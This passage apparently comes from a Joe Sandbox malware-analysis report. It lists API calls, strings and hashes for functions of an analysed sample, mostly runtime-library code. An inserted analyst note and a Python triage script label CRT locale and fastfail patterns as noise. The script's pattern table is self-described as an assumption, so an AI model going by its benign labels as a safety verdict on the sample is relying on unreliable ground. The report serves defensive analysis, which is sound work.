                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: fe081cf2f1624891d90fca6a2b45f45030a01409874485435bb9a0f33b242264
                                                      • Instruction ID: 602f631550031705a7b4a32f2d840f0f4e57b02c2e10a7298913e61e5a91e547
                                                      • Opcode Fuzzy Hash: fe081cf2f1624891d90fca6a2b45f45030a01409874485435bb9a0f33b242264
                                                      • Instruction Fuzzy Hash: ADF0FE32A00116AFEB3857108C05FBA7778DF40364F158426EC09A3144DA78FE42D5D1
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F72401
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID: utf8
                                                      • API String ID: 3736152602-905460609
                                                      • Opcode ID: b924c2b88659f8a0906abbc4c5121bd42d01ff56f033aa0064415ad8580eb44a
                                                      • Instruction ID: be6355063f7bceee3ceaf393bec53aa4abb4985e54b6c084751ee689179bf43e
                                                      • Opcode Fuzzy Hash: b924c2b88659f8a0906abbc4c5121bd42d01ff56f033aa0064415ad8580eb44a
                                                      • Instruction Fuzzy Hash: 3CF02832B04105ABC714AF34DC49EBA33ECDB45310F20007AB906D7281EAB8AE04A791
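A reading note on the entries above. The two functions that pair IsDebuggerPresent with SetUnhandledExceptionFilter(00000000) and UnhandledExceptionFilter (call sites 00F5BA69 to 00F5BA93 and 00F61D2C to 00F61D43), the first preceded by IsProcessorFeaturePresent(00000017), i.e. PF_FASTFAIL_AVAILABLE, show the MSVC runtime's fastfail/security-failure reporting path (vcruntime's __scrt_fastfail and the /GS __raise_securityfailure). In that path the debugger check only decides whether an attached debugger is handed the failure before the process is terminated; these calls are enough to fire the report's "Contains functionality to check if a debugger is running (IsDebuggerPresent)" signature on their own, so that signature should not be read as bespoke anti-debugging in the sample. Similarly, the GetLocaleInfoW / EnumSystemLocalesW entries, with LCTYPE 20000001 (LOCALE_RETURN_NUMBER | LOCALE_ILANGUAGE), flag 00000001 (LCID_INSTALLED) and the "utf8" string, are the UCRT's setlocale machinery. The script below is an added example, not Joe Sandbox code and not code from the sample: it parses the "APIs" lines of such entries and labels the runtime-library patterns so an analyst can set them aside and spend time on the rest. Its sample input copies call lines from this report plus one constructed entry with a placeholder address, and its pattern table is an assumption drawn from public CRT source rather than anything the report states.

```python
"""Triage helper for the per-function "APIs" lists in a Joe Sandbox report.

Added example: not part of the report and not code from the analysed sample.
Parses lines like "• IsDebuggerPresent.KERNEL32 ref: 00F5BA69", groups them
into function entries ("APIs" header up to the next "Memory Dump Source") and
labels entries whose API set matches compiler-generated MSVC/UCRT runtime code.
The pattern table is an assumption drawn from public vcruntime/ucrt source.
"""
import re
from dataclasses import dataclass

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"         # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?,?\s*"     # optional (arg,arg,...) and comma
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)")      # call-site address

NTSTATUS_NAMES = {0xC000000D: "STATUS_INVALID_PARAMETER"}
CRT_FAILURE_REPORT = {"IsDebuggerPresent", "SetUnhandledExceptionFilter",
                      "UnhandledExceptionFilter"}
CRT_LOCALE_APIS = {"GetLocaleInfoW", "EnumSystemLocalesW",
                   "GetLastError", "SetLastError"}

@dataclass
class ApiCall:
    api: str
    args: list
    ref: str
    from_subcall: bool   # "Part of subcall function ..." lines

def hex_arg(value):
    """'C000000D' -> 0xC000000D; placeholders such as '?' give None."""
    try:
        return int(value, 16)
    except ValueError:
        return None

def parse_entries(report_text):
    """One list of ApiCall per "APIs" block of the report text."""
    entries, current = [], None
    for line in report_text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            entries.append(current)
        elif stripped == "Memory Dump Source":
            current = None
        elif current is not None and (m := LINE_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            current.append(ApiCall(m["api"], args, m["ref"].upper(),
                                   m["sub"] is not None))
    return entries

def classify(calls):
    """Triage label for one function entry."""
    direct = [c for c in calls if not c.from_subcall]   # skip subcall lines
    apis = {c.api for c in direct}
    # vcruntime __scrt_fastfail / gs_report __raise_securityfailure: here
    # IsDebuggerPresent only decides whether an attached debugger is handed
    # the failure; it is not the sample's own anti-debugging logic.
    if CRT_FAILURE_REPORT <= apis:
        return "CRT fastfail/security-failure reporting"
    if apis and apis <= CRT_LOCALE_APIS:           # ucrt setlocale machinery
        return "CRT locale initialisation"
    detail = []                                     # everything else: analyst
    for c in direct:
        if c.api == "RaiseException" and c.args:    # decode the NTSTATUS
            detail.append("RaiseException(%s)"
                          % NTSTATUS_NAMES.get(hex_arg(c.args[0]), c.args[0]))
        else:
            detail.append(c.api)
    return "review: " + ",".join(detail)

def triage(report_text):
    """(address of first direct call, label) for each function entry."""
    return [(next((c.ref for c in calls if not c.from_subcall), ""), classify(calls))
            for calls in parse_entries(report_text)]

# Constructed input: the first three entries copy call lines from this report;
# the last is made up (placeholder address 00000000) to show a debugger check
# that does NOT match the CRT pattern and therefore stays flagged for review.
SAMPLE = """\
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F5B99D
• IsDebuggerPresent.KERNEL32 ref: 00F5BA69
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F5BA89
• UnhandledExceptionFilter.KERNEL32(?), ref: 00F5BA93
Memory Dump Source
APIs
  • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F727E1,00000000,00000000,?), ref: 00F72A73
Memory Dump Source
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,3FC00000,?,00000008,?,?,00F6D2B6,3FC00000,?,00000008,?,?,00F76D94,00000000), ref: 00F6D4E8
Memory Dump Source
APIs
• IsDebuggerPresent.KERNEL32 ref: 00000000
• ExitProcess.KERNEL32(00000001), ref: 00000000
Memory Dump Source
"""
```

Subcall lines are parsed but excluded from the API set, because the report inherits them into every caller of 00F691E1 and they would otherwise make unrelated functions look like locale code. Anything the table does not recognise is returned as "review:" with the obvious constants decoded, so the helper only removes noise and never hides a function from the analyst.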
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • EnumSystemLocalesW.KERNEL32(00F72818,00000001,45F1B473,?,-00000050,?,00F72BBA,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F72584
                                                       Memory Dump Source
                                                       • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      APIs
                                                        • Part of subcall function 00F61F98: EnterCriticalSection.KERNEL32(?,?,00F66CC3,00000000,00F87F68,0000000C,00F66C8A,0000000C,?,00F681AD,0000000C,?,00F6937F,00000001,00000364,?), ref: 00F61FA7
                                                      • EnumSystemLocalesW.KERNEL32(00F68211,00000001,00F88028,0000000C,00F68640,00000000), ref: 00F68256
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • EnumSystemLocalesW.KERNEL32(00F723AD,00000001,45F1B473,?,?,00F72C18,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F7248B
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F6682E,?,20001004,00000000,00000002,?,?,00F65E30), ref: 00F68778
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000BAFF,00F5AE57), ref: 00F5BAF8
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00F8B564,00000FA0,?,?,00F5B003), ref: 00F5B031
                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00F5B003), ref: 00F5B03C
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00F5B003), ref: 00F5B04D
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F5B05F
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F5B06D
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00F5B003), ref: 00F5B090
                                                      • DeleteCriticalSection.KERNEL32(00F8B564,00000007,?,?,00F5B003), ref: 00F5B0AC
                                                      • CloseHandle.KERNEL32(00000000,?,?,00F5B003), ref: 00F5B0BC
                                                      Strings
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F5B037
                                                      • kernel32.dll, xrefs: 00F5B048
                                                      • SleepConditionVariableCS, xrefs: 00F5B059
                                                      • WakeAllConditionVariable, xrefs: 00F5B065
                                                      Similarity
                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 2565136772-3242537097
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F5665C
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F56679
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00F5669D
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00F566C8
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F5673A
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F5678F
                                                      • __Getctype.LIBCPMT ref: 00F567A6
                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00F567E6
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00F56888
                                                      • std::_Facet_Register.LIBCPMT ref: 00F5688E
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
                                                      • String ID: bad locale name
                                                      • API String ID: 103145292-1405518554
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F5AD3A
                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00F5AD48
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00F5AD59
                                                      • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00F5AD6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                      • API String ID: 667068680-1247241052
                                                      • Opcode ID: 4c9d848548061fb28a8f5c2061d5918be82f7b1519dbd81327b48fd8266711e3
                                                      • Instruction ID: 1105d3c90c829b15db57b36a8d7d33e1ee27b1075033b18fd9f42417253606ba
                                                      • Opcode Fuzzy Hash: 4c9d848548061fb28a8f5c2061d5918be82f7b1519dbd81327b48fd8266711e3
                                                      • Instruction Fuzzy Hash: AEE0EC7195122CAF83019F70BC0E99A3FA4AB467553028813F40DD2262D7B08484BFA3
                                                      APIs
                                                      • type_info::operator==.LIBVCRUNTIME ref: 00F5E947
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00F5EA55
                                                      • _UnwindNestedFrames.LIBCMT ref: 00F5EBA7
                                                      • CallUnexpected.LIBVCRUNTIME ref: 00F5EBC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2751267872-393685449
                                                      • Opcode ID: eb49dc36b74d2cdf15cb54aec0b0ecea623f5c9ef26d425fc217a5719170c729
                                                      • Instruction ID: 42f5501b0d043fd4f7c7403fcb020c44fb0a2d2171aec02fec28a8c3a6623358
                                                      • Opcode Fuzzy Hash: eb49dc36b74d2cdf15cb54aec0b0ecea623f5c9ef26d425fc217a5719170c729
                                                      • Instruction Fuzzy Hash: 78B17975C00219EFCF28DFA4C8819AEBBB5BF44322F14415AEE156B202D334DB59EB91
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16$Info
                                                      • String ID:
                                                      • API String ID: 127012223-0
                                                      • Opcode ID: f6c7dd3a4088d3b3023379f334e0c5989e33fa98a8a01cd66e946fb4cb2a17f5
                                                      • Instruction ID: 38ac0f39b7725ab4508c71384dc9aeacc0a86de0e9b5507be3c9c81d92c954d2
                                                      • Opcode Fuzzy Hash: f6c7dd3a4088d3b3023379f334e0c5989e33fa98a8a01cd66e946fb4cb2a17f5
                                                      • Instruction Fuzzy Hash: A7712A32D402099BDF219E68CC49FAE77B99F457A0F288057E91CA7241EF759C03E762
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A4FC
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A519
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A53A
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A5BD
                                                      • __Xtime_diff_to_millis2.LIBCPMT ref: 00F5A5D5
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A601
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A647
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentThread$Xtime_diff_to_millis2
                                                      • String ID:
                                                      • API String ID: 1280559528-0
                                                      • Opcode ID: 5efdf5c3d5b953ae1527e3bd0fddf122bfcf0f4a07fd9be03c346ec15b82c2ff
                                                      • Instruction ID: ce8a2f5a8af6e1766f8661b15c09e674ae0e12febb4a8f23e77fd1b9fd728af1
                                                      • Opcode Fuzzy Hash: 5efdf5c3d5b953ae1527e3bd0fddf122bfcf0f4a07fd9be03c346ec15b82c2ff
                                                      • Instruction Fuzzy Hash: 40519C71D00105CFCF21CF24D9819ADB7B0AF08722B294659DE4A9B245EB34ED99EF93
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,8C9F690D,?,00F684F4,00F54C93,?,?,00000000), ref: 00F684A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3664257935-537541572
                                                      • Opcode ID: 59394ddaa696c4fc96ee4cfdec6013d3a36a9352313e4fbeabe38b2cc132bc31
                                                      • Instruction ID: f5289dba1524b1ac7c7e6a2d6283adc4a82354180f0cdb9c25da0d5991b88da3
                                                      • Opcode Fuzzy Hash: 59394ddaa696c4fc96ee4cfdec6013d3a36a9352313e4fbeabe38b2cc132bc31
                                                      • Instruction Fuzzy Hash: 0421A572E0021AABCB21DB24DC41A6A3768EB417F4F260619E919A7291DF30ED42E6D1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27b4f438f055af5fa2de7bf6e043b2adcc58b38dd55a2510bd00160d3c6a789f
                                                      • Instruction ID: 0842efb85beea37747f6a92dd21e31ebe56b9cee6b6b5de4ea4f7f0b4712f117
                                                      • Opcode Fuzzy Hash: 27b4f438f055af5fa2de7bf6e043b2adcc58b38dd55a2510bd00160d3c6a789f
                                                      • Instruction Fuzzy Hash: 01B1D171E04649AFDF51DF98CC80BBDBBB1BF45310F18815AE409AB292C7749D41EB62
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00F5E4B1,00F5C0BF,00F58281,8C9F690D,?,?,?,?,00F79112,000000FF), ref: 00F5E4C8
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F5E4D6
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F5E4EF
                                                      • SetLastError.KERNEL32(00000000,?,00F5E4B1,00F5C0BF,00F58281,8C9F690D,?,?,?,?,00F79112,000000FF), ref: 00F5E541
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 694020a4b9c7920956bfbe50cb342979b225ad340393982ec792cc3338e42e64
                                                      • Instruction ID: 6851e9a4a9736d9aea5a14be4b07023a5f109db6b0475d02a80be80a75149f25
                                                      • Opcode Fuzzy Hash: 694020a4b9c7920956bfbe50cb342979b225ad340393982ec792cc3338e42e64
                                                      • Instruction Fuzzy Hash: 8801283350D7165DA7183BB57C4967A3654EB65B767280339FE11810F0FF518D0CB245
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8C9F690D,?,?,00000000,00F792E8,000000FF,?,00F6523F,?,?,00F65213,00000016), ref: 00F652E4
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F652F6
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00F792E8,000000FF,?,00F6523F,?,?,00F65213,00000016), ref: 00F65318
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: fc5fb65cb9609c89717c0611971e3c91b54c3a238cc47aeba3c4f00ade092759
                                                      • Instruction ID: 64c899496f0bccdc7b8bf0601bb17a7864604ba17128dd711aa6eddf601b83bb
                                                      • Opcode Fuzzy Hash: fc5fb65cb9609c89717c0611971e3c91b54c3a238cc47aeba3c4f00ade092759
                                                      • Instruction Fuzzy Hash: 0101DB31904619EFDB118F50DD05FAEBBB9FB44F54F004529F815B26D0DBB59900DB52
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
